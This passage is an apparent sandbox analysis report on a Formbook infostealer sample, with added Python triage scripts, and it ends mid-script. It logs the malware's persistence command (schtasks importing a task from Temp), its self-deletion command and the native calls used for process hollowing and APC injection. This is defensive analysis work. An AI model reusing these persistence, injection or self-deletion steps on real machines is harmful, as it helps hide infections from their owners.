          Source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 0_2_0288C124
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 0_2_0288E561
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 0_2_0288E570
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_00401030
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_0041B9C8
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_0041C272
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_00408C5C
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_00408C60
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_0041B4A3
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_00402D87
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_00402D90
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_00402FB0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_0508F900
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_05080D20
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050A4120
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_05151D55
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_0509D5E0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_05141002
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_0509841F
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_0509B090
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050BEBB0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050A6E30
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02EC2FB0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02EC8C60
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02EC8C5C
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02EC2D87
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02EC2D90
          Source: C:\Windows\SysWOW64\control.exe | Code function: String function: 0508B150 appears 32 times
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_004181C0 NtCreateFile
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_00418270 NtReadFile
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_004182F0 NtClose
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_004183A0 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_004181BA NtCreateFile
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_0041826A NtReadFile
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_004182EA NtClose
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Code function: 6_2_0041839A NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9540 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C99A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C95D0 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9650 NtQueryValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C96D0 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C96E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050CAD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9560 NtWriteFile
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C99D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C95F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050CB040 NtSuspendThread
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C98A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C98F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050CA710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9760 NtOpenProcess
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050CA770 NtOpenThread
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C97A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050CA3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9A10 NtQuerySection
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9A20 NtResumeThread
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_050C9A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02ED82F0 NtClose
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02ED8270 NtReadFile
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02ED83A0 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02ED81C0 NtCreateFile
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02ED82EA NtClose
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02ED826A NtReadFile
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02ED839A NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\control.exe | Code function: 20_2_02ED81BA NtCreateFile
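Two things in the "Code function" rows above are worth checking by hand rather than by eye. First, the functions the sandbox found at 0x004xxxxx in process 6 (tgamf4XuLa.exe, the hollowed child) reappear in process 20 (control.exe) at 0x02ECxxxx/0x02EDxxxx, every one shifted by the same constant: the same payload image, rebased. Second, the stubs clustered at 0x050C9000-0x050CB000 in control.exe resolve the full set of native calls a hollowing/APC injector needs. The Python below is an added example (not Joe Sandbox code and not taken from the sample): it parses a constructed excerpt of those rows, votes on a load-address delta to detect the rebased copy, and reports which injection primitive chains are fully present per process. The chain definitions and the "same delta means same image" heuristic are this example's own assumptions.

```python
import re
from collections import Counter, defaultdict

# Constructed excerpt of the report's "Code function" rows (pid_2_address and the resolved
# API names as the report prints them); deliberately not the complete list.
REPORT_ROWS = """
6_2_00402D87
6_2_00402D90
6_2_00402FB0
6_2_00408C5C
6_2_00408C60
6_2_0041B9C8
6_2_004181C0 NtCreateFile
6_2_00418270 NtReadFile
6_2_004182F0 NtClose
6_2_004183A0 NtAllocateVirtualMemory
20_2_0508F900
20_2_050A4120
20_2_050C99A0 NtCreateSection,LdrInitializeThunk
20_2_050C9780 NtMapViewOfSection,LdrInitializeThunk
20_2_050CAD30 NtSetContextThread
20_2_050C9950 NtQueueApcThread
20_2_050C98A0 NtWriteVirtualMemory
20_2_050CA770 NtOpenThread
20_2_050C97A0 NtUnmapViewOfSection
20_2_050C9A20 NtResumeThread
20_2_050C99D0 NtCreateProcessEx
20_2_02EC2D87
20_2_02EC2D90
20_2_02EC2FB0
20_2_02EC8C5C
20_2_02EC8C60
20_2_02ED81C0 NtCreateFile
20_2_02ED8270 NtReadFile
20_2_02ED82F0 NtClose
20_2_02ED83A0 NtAllocateVirtualMemory
"""

ROW_RE = re.compile(r"^(\d+)_\d+_([0-9A-Fa-f]{8})(?:\s+([\w,]+))?$")

def parse_rows(text):
    """Return {pid: {address: [api, ...]}} from report-style 'pid_2_address [apis]' rows."""
    funcs = defaultdict(dict)
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        pid, addr, apis = int(m.group(1)), int(m.group(2), 16), m.group(3)
        funcs[pid][addr] = apis.split(",") if apis else []
    return funcs

def find_rebased_copy(addrs_a, addrs_b, min_matches=5):
    """Vote on the delta b - a over all address pairs. A delta supported by many pairs
    means the same code is present in both processes at different load addresses."""
    votes = Counter(b - a for a in addrs_a for b in addrs_b)
    if not votes:
        return None
    delta, support = votes.most_common(1)[0]
    return (delta, support) if support >= min_matches else None

# Assumed primitive chains (example's own mapping, not something the report states).
INJECTION_CHAINS = {
    "process hollowing": {"NtUnmapViewOfSection", "NtWriteVirtualMemory",
                          "NtSetContextThread", "NtResumeThread"},
    "section mapping": {"NtCreateSection", "NtMapViewOfSection"},
    "APC injection": {"NtOpenThread", "NtQueueApcThread"},
}

def injection_chains(funcs_for_pid):
    """Name each chain whose native calls are all resolved somewhere in the process."""
    seen = {api for apis in funcs_for_pid.values() for api in apis}
    return sorted(name for name, need in INJECTION_CHAINS.items() if need <= seen)

def triage_functions(text):
    funcs = parse_rows(text)
    result = {"chains": {pid: injection_chains(f) for pid, f in funcs.items()}, "rebased": {}}
    pids = sorted(funcs)
    for i, a in enumerate(pids):
        for b in pids[i + 1:]:
            hit = find_rebased_copy(funcs[a], funcs[b])
            if hit:
                result["rebased"][(a, b)] = hit
    return result

if __name__ == "__main__":
    r = triage_functions(REPORT_ROWS)
    for pid, chains in sorted(r["chains"].items()):
        print("pid %d: %s" % (pid, ", ".join(chains) or "no injection chain"))
    for (a, b), (delta, n) in r["rebased"].items():
        print("pid %d code reappears in pid %d rebased by +0x%X (%d matching functions)" % (a, b, delta, n))
```

On the excerpt the vote lands on +0x02AC0000 (0x00400000 to 0x02EC0000), which is also the region in process 20 that the Formbook YARA rules matched above, so the "Maps a DLL or memory area into another process" verdict can be corroborated from the function table alone. The 0x050Cxxxx stubs sit a few hundred KB above the address where the report finds the wntdll.pdb string in control.exe memory, which is consistent with a second, privately mapped ntdll; confirming that needs the dump, not this script.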
          Source: tgamf4XuLa.exe | Binary or memory string: OriginalFilename vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exe, 00000000.00000000.224546803.00000000006A2000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameFormatt.exe4 vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exe, 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameCF_Secretaria.dll< vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exe, 00000000.00000002.236927169.00000000029DB000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameEnvoySinks.dll6 vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exe | Binary or memory string: OriginalFilename vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exe, 00000006.00000002.339403773.0000000000862000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameFormatt.exe4 vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exe, 00000006.00000002.343404055.0000000001385000.00000040.00020000.sdmp | Binary or memory string: OriginalFilenameCONTROL.EXEj% vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exe, 00000006.00000002.343854917.000000000169F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exe | Binary or memory string: OriginalFilenameFormatt.exe4 vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: HpnpObXJP.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | File read: C:\Users\user\Desktop\tgamf4XuLa.exe
          Source: tgamf4XuLa.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Users\user\Desktop\tgamf4XuLa.exe 'C:\Users\user\Desktop\tgamf4XuLa.exe'
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HpnpObXJP' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp'
          Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Process created: C:\Users\user\Desktop\tgamf4XuLa.exe C:\Users\user\Desktop\tgamf4XuLa.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\tgamf4XuLa.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HpnpObXJP' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp'
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Process created: C:\Users\user\Desktop\tgamf4XuLa.exe C:\Users\user\Desktop\tgamf4XuLa.exe
          Source: C:\Windows\SysWOW64\control.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\tgamf4XuLa.exe'
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | File created: C:\Users\user\AppData\Roaming\HpnpObXJP.exe
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | File created: C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp
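The process-creation and file-creation rows above contain the whole execution chain in a form a triage script can check: the dropper copies itself to AppData\Roaming\HpnpObXJP.exe, registers a scheduled task Updates\HpnpObXJP from an XML file in the user's Temp directory, re-launches itself (the hollowed child), and later a control.exe that was started by explorer.exe (a process the sample never created) deletes the original file with cmd /c del. The Python below is an added example, not Joe Sandbox code: it takes those rows as constructed tuples and derives the persistence, self-deletion and hijacked-parent findings. The "parent never created by the sample's tree means injection" rule is a heuristic this example assumes.

```python
import ntpath
import re

# Constructed from the "Process created" rows above: (parent image, child image, command line).
PROCESS_ROWS = [
    ("unknown", r"C:\Users\user\Desktop\tgamf4XuLa.exe", r"'C:\Users\user\Desktop\tgamf4XuLa.exe'"),
    (r"C:\Users\user\Desktop\tgamf4XuLa.exe", r"C:\Windows\SysWOW64\schtasks.exe",
     r"'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HpnpObXJP' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp'"),
    (r"C:\Windows\SysWOW64\schtasks.exe", r"C:\Windows\System32\conhost.exe",
     r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    (r"C:\Users\user\Desktop\tgamf4XuLa.exe", r"C:\Users\user\Desktop\tgamf4XuLa.exe",
     r"C:\Users\user\Desktop\tgamf4XuLa.exe"),
    (r"C:\Windows\explorer.exe", r"C:\Windows\SysWOW64\control.exe", r"C:\Windows\SysWOW64\control.exe"),
    (r"C:\Windows\SysWOW64\control.exe", r"C:\Windows\SysWOW64\cmd.exe",
     r"/c del 'C:\Users\user\Desktop\tgamf4XuLa.exe'"),
    (r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\System32\conhost.exe",
     r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]
# Constructed from the "File created" rows above.
FILES_CREATED = [r"C:\Users\user\AppData\Roaming\HpnpObXJP.exe",
                 r"C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp"]

def _args(cmdline):
    """Split a command line on whitespace, keeping single-quoted arguments whole."""
    return [t.strip("'") for t in re.findall(r"'[^']*'|\S+", cmdline)]

def find_root_sample(rows):
    """The sample is the first process whose parent the sandbox could not attribute."""
    for parent, child, _ in rows:
        if parent == "unknown":
            return child
    return None

def detect_task_persistence(rows, files_created):
    findings = []
    for parent, child, cmdline in rows:
        if ntpath.basename(child).lower() != "schtasks.exe":
            continue
        args = _args(cmdline)
        low = [a.lower() for a in args]
        if "/create" not in low:
            continue
        task = args[low.index("/tn") + 1] if "/tn" in low else None
        xml = args[low.index("/xml") + 1] if "/xml" in low else None
        f = {"type": "scheduled task", "by": parent, "task": task, "xml": xml}
        if xml and "\\appdata\\local\\temp\\" in xml.lower():
            f["note"] = "task definition imported from a temp file"
        if task:  # link the task name to a dropped copy with the same stem
            stem = ntpath.basename(task)
            f["dropped_copy"] = [p for p in files_created
                                 if ntpath.splitext(ntpath.basename(p))[0] == stem]
        findings.append(f)
    return findings

def detect_self_delete(rows, sample_path):
    if not sample_path:
        return None
    for parent, child, cmdline in rows:
        if ntpath.basename(child).lower() == "cmd.exe":
            low = [a.lower() for a in _args(cmdline)]
            if "del" in low and sample_path.lower() in low:
                return {"type": "self-deletion", "by": parent, "target": sample_path}
    return None

def detect_hijacked_parents(rows):
    """Heuristic: a parent that spawns children here but was never itself created in the
    sample's tree is a pre-existing system process, so code reached it by injection."""
    created = {child.lower() for _, child, _ in rows}
    return sorted({parent for parent, _, _ in rows
                   if parent != "unknown" and parent.lower() not in created})

def triage_process_tree(rows, files_created):
    sample = find_root_sample(rows)
    return {
        "sample": sample,
        "persistence": detect_task_persistence(rows, files_created),
        "self_delete": detect_self_delete(rows, sample),
        "hijacked_parents": detect_hijacked_parents(rows),
    }

if __name__ == "__main__":
    for key, value in triage_process_tree(PROCESS_ROWS, FILES_CREATED).items():
        print("%-17s %s" % (key + ":", value))
```

The same three checks translate directly into endpoint detections: schtasks.exe /Create whose /XML argument lives under a user's Temp directory, cmd.exe deleting the image path of an ancestor process, and a shell or control-panel host whose parent is explorer.exe but whose grandparent chain contains no user action.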
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@10/4@10/7
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4704:120:WilError_01
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6436:120:WilError_01
          Source: tgamf4XuLa.exe, Forms/mainForm.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: HpnpObXJP.exe.0.dr, Forms/mainForm.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 0.0.tgamf4XuLa.exe.6a0000.0.unpack, Forms/mainForm.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 0.2.tgamf4XuLa.exe.6a0000.0.unpack, Forms/mainForm.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 6.2.tgamf4XuLa.exe.860000.1.unpack, Forms/mainForm.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 6.0.tgamf4XuLa.exe.860000.0.unpack, Forms/mainForm.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: tgamf4XuLa.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: tgamf4XuLa.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: tgamf4XuLa.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: control.pdb | source: tgamf4XuLa.exe, 00000006.00000002.343389175.0000000001380000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP | source: tgamf4XuLa.exe, 00000006.00000002.343446284.00000000013F0000.00000040.00000001.sdmp, control.exe, 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb | source: tgamf4XuLa.exe, 00000006.00000002.343446284.00000000013F0000.00000040.00000001.sdmp, control.exe
          Source: Binary string: control.pdbUGP | source: tgamf4XuLa.exe, 00000006.00000002.343389175.0000000001380000.00000040.00020000.sdmp

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: tgamf4XuLa.exe, Forms/mainForm.cs | .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: HpnpObXJP.exe.0.dr, Forms/mainForm.cs | .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.tgamf4XuLa.exe.6a0000.0.unpack, Forms/mainForm.cs | .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.tgamf4XuLa.exe.6a0000.0.unpack, Forms/mainForm.cs | .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.2.tgamf4XuLa.exe.860000.1.unpack, Forms/mainForm.cs | .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.tgamf4XuLa.exe.860000.0.unpack, Forms/mainForm.cs | .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
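Three signatures on this page describe one loader pattern: a 38272-character literal in Forms/mainForm.cs, the CreateDecryptor/TransformFinalBlock calls, and the Assembly.Load(byte[]) call in the same class. Read together, the stage-one .NET executable carries its next stage as an encrypted string literal, decrypts it at run time and loads the result reflectively, so it never touches disk. The "very large strings" check can be reproduced on the raw file without a decompiler, because .NET string literals live in the metadata #US (user-string) heap. The Python below is an added example, not Joe Sandbox code and not the sample's own: it walks the PE to the CLI metadata, locates the #US stream, and lists oversized literals. The heap at the end is constructed for the demonstration; the 38272 length is borrowed from the report's finding and the content is filler, and the decryption key or cipher is not known from the page and is not attempted here.

```python
import struct

def read_compressed_uint(buf, pos):
    """Decode an ECMA-335 compressed unsigned integer at buf[pos]; return (value, next_pos)."""
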